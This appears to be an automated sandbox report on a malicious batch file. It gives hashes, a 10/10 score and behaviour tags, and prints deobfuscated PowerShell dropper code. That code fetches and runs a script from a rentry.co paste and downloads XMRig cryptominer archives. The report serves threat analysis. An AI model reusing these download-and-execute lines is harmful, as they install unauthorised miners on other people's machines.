General

  • Target

    107671216610864.bat

  • Size

    517B

  • Sample

    240630-3awgqsydrf

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$tempfile = [system.io.path]::gettempfilename()
$tempfile = ".bat"
$wc.downloadfile("https://rentry.co/regele/raw", ".bat")
.bat 42 crnhwckm6bmza8jmwyvwb2tjacxqgmj1qhhj9ae55qrx488q6cvau42ekkeied2n9te1ujnviusnvqv1nj17r79fdhjvl
remove-item -force $tempfile
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip", "C:\\Users\\Admin\\xmrig.zip")
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
$wc = new-object system.net.webclient
$str = $wc.downloadstring("https://github.com/xmrig/xmrig/releases/latest")
$str|findstr msvc-win64.zip|findstr download
URLs
ps1.dropper

https://github.com/xmrig/xmrig/releases/latest

Extracted

Language
ps1
Deobfuscated
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
$wc = new-object system.net.webclient
$wc.downloadfile("https://github.comDownloadString", "C:\\Users\\Admin\\xmrig.zip")
URLs
exe.dropper

https://github.comDownloadString

Targets

    • Target

      107671216610864.bat

    Score
    10/10
    • Blocklisted process makes network request

    • Stops running service(s)

    • Legitimate hosting services abused for malware hosting/C2
